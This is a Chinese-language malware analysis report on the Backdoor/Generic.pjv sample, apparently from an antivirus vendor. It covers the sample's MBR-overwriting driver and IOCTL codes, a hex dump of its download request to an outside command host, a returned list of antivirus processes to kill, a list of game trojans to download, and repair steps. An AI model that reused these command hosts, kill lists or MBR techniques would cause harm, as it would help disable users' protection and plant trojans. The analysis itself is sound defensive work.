“通犯”變種pjv頻繁攻擊用戶成7月主要安全威脅

Backdoor/Generic.pjv運行後，首先是載入自己的驅動程式,驅動程式本身不具備破壞性，它等待病毒程式的喚醒操作，再進入破壞的流程，具體有感染MBR達到開機自動更新病毒，破壞殺毒軟體，讓殺毒失效。
病毒程式本身在完成驅動載入，磁片讀取之後，再進行聯網操作，下載網路遊戲木馬，至本地。如果有殺毒軟體的進程運行，內核層直接結束。下載的遊戲木馬太多，功能也各不一樣，偽裝成殺毒軟體的名稱運行。
病毒描述

病毒名稱    : Backdoor/Generic.pjv
文件MD5     : 32f7445e7aeff1e49e7e5126bda85664
文件大小    : 139,264位元組
編寫環境    : C++
是否加殼    : 無

文檔公開級別 ： 完全公開

病毒執行體描述：

    Backdoor/Generic.pjv運行後，首先是載入自己的驅動程式,驅動程式本身不具備破壞性，它等待病毒程式的喚醒操作，再進入破壞的流程，具體有感染MBR達到開機自動更新病毒，破壞殺毒軟體，讓殺毒失效。
病毒程式本身在完成驅動載入，磁片讀取之後，再進行聯網操作，下載網路遊戲木馬，至本地。如果有殺毒軟體的進程運行，內核層直接結束。下載的遊戲木馬太多，功能也各不一樣，偽裝成殺毒軟體的名稱運行。

病毒行為流程分析:

一．
    此樣本傳播的途徑不詳，初次運行後會釋放驅動程式，並完成驅動的安裝。驅動程式本身並不執行相關操作，它則是等待病毒程式在用戶層發送IOCTL碼，而執行相關操作。
驅動程式內分為四個部分:
IOCTL: 0x222400
    完成對IRP_MJ_FLUSH_BUFFERS和IRP_MJ_SHUTDOWN 派遣函數的掛鈎,經過後面分析得出掛鈎兩個歷程是為了確保MBR的修改是成功的,防止以防修改錯誤啟動失敗。
IOCTL: 0x222404
    完成對MBR的寫入操作,對用戶層傳來的資料進行保存,第一步是保存原始MBR,此處的此病毒的做法是512位元組整體覆蓋,到執行到病毒MBR完成相關操作後,會把MBR的執行權丟給系統原始MBR，進行啟動操作。
IOCTL: 0x222408
IOCTL: 0x22240C
檔刪除的相關操作。

二．
病毒用戶層部分大致可以分為五個部分:
1.將驅動檔釋放到磁片中,資源檔案保存的方法比較特別。
2.遍曆系統當前的進程,看是否有殺軟的進程。
3.載入驅動相關鉤子的安裝。
4.阻止殺毒軟體的運行。
5.連網下載遊戲木馬病毒程式，主要的功能是為了完成遊戲木馬的下載，程式更新的方式使用修改MBR達到開機更新木馬。

三．
  當系統當前無任何防護狀態下,病毒會連接網站下載其他遊戲木馬，讀取一段加密的資料。
  在解密的資料區內尋找位元組特徵 77 66 55 44 77 88 99 AA，定位到存放網頁位址的位置，需要連接的位址。
  動態載入iphlpapi.php , GetAdaptersInfo 獲取電腦網卡相關資訊
/count/count.asp?mac=00-0C-29-72-3C-84&time=1341367221&procs=%PROCS&id=0005&run=NEXT
將計算得到的資訊保存起來,傳到伺服器,作為安裝依據。
使用完資料以後,在進行相關資料加密。
以Send Recv方式進行80埠的資料報發送,避免調用WebAPI。

00D30020  47 45 54 20 2F 72 75 6E 35 2E 74 78 74 20 48 54  GET /run5.txt HT
00D30030  54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 77 77 77  TP/1.1..Host:www
00D30040  2E 7A 70 6C 79 61 2E 63 6F 6D 3A 38 30 38 32 0D  .zplya.com:8082.
00D30050  0A 52 61 6E 67 65 3A 20 62 79 74 65 73 3D 30 2D  .Range: bytes=0-
00D30060  34 30 39 35 0D 0A 41 63 63 65 70 74 3A 20 2A 2F  4095..Accept: */
00D30070  2A 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 4D 6F  *..User-Agent:Mo
00D30080  7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61  zilla/4.0 (compa
00D30090  74 69 62 6C 65 3B 20 4D 53 49 45 20 35 2E 30 30  tible; MSIE 5.00
00D300A0  3B 20 57 69 6E 64 6F 77 73 20 39 38 29 0D 0A 43  ; Windows 98)..C
00D300B0  6F 6E 6E 65 63 74 69 6F 6E 3A 4B 65 65 70 2D 41  onnection:Keep-A
00D300C0  6C 69 76 65 0D 0A 0D 0A 00 00 00 00 00 00 00 00  live............

成功則返回下列資料
TIME=2400
RUNMODE=3
KILLPROCLIST=360tray.exe|360sd.exe|360rp.exe|360rps.exe|ZhuDongFangYu.exe|360leakfixer.exe|avp.exe|avp.exe|popwndexe.exe|RavMonD.exe|RsMgrSvc.exe|RsTray.exe|RsAgent.exe|KSafeSvc.exe|KSafeTray.exe|kxescore.exe|kxetray.exe|KVExpert.exe|KVMonXP.exe|KVSrvXP.exe|egui.exe|ekrn.exe

DOWNLIST=DOWN:/wm1/cs.exe,LOOP|DOWN:/wm1/mh.exe,LOOP|DOWN:/wm1/tl.exe,LOOP|DOWN:/wm1/wendao.exe,LOOP|DOWN:/wm1/wow.exe,LOOP|DOWN:/wm1/yy.exe,LOOP|DOWN:/wm1/qq.exe|DOWN:/wm1/dnf.exe,LOOP|DOWN:/wm1/my.exe,LOOP|DOWN:/wm1/m3guo.exe,LOOP|DOWN:/wm/hx.exe,LOOP

00403068 call 00401023    _DownloadFile_Execut 調用此函數,完成樣本下載並執行。
當下載執行結束以後則向驅動發送自刪的請求。

釋放的檔:

%SystemRoot%System32Drivers44ff12c.sys
//殺軟控制以及MBR寫入的檔。
%SystemRoot%XXX.exe      
//下載的病毒集合，以及隨機檔案名稱。

病毒技術要點

    病毒對系統對自身避免殺毒查殺上做了很多規避,利用修改MBR達到病毒無檔自啟動，對系統的支援性和容錯方面做了一些判斷，程式第一次運行和重啟以後運行的流程完全不一樣。
    但是達到一個完整的效果，就是下載遊戲木馬病毒。第一次的運行在對MBR寫入後,在相應修改MBR位置所對應的區域也是自己存放原始MBR以及啟動資料代碼Hook相關的操作。
    在寫入MBR時,Hook IRP_MJ_FLUSH_BUFFERS和IRP_MJ_SHUTDOWN，確保MBR是三段完全寫入的。防止自身被欺騙。但是在重啟過以後，Hook的物件IRP_MJ_Read和IRP_MJ_WRITE, 保證自己有可執行用戶層樣本的許可權。

病毒清理流程

1. 病毒自身不會對MBR進行監視,一次操作以後自身刪除,不再管MBR了。
2．在保證病毒體不被運行的情況下,可以修復MBR分區表,當MBR恢復以後程式自身不會被載入到。
3．樣本未對BIOS進行修改，可以直接用相關工具直接修復。

Fdisk/MBR修復法
    用啟動盤啟動電腦，在命令提示符下輸入“Fdisk/mbr”命令，再按”Enter”鍵即可進行修復。
    用Fdisk/mbr命令修復 MBR的方法只適用于主引導區記錄被引導區型病毒破壞或主引導記錄代碼丟失，且主分區沒有損壞的情況。因為此方法只是覆蓋主引導區記錄的代碼，不能重建主分區表。
    啟動 DOS並輸入“C：” ，按“Enter”鍵，如果可以讀取C盤資料就能用Fdisk/MBR命令恢復MBR，且能保留原有資料；否則不能用Fdisk/MBR命令恢復MBR。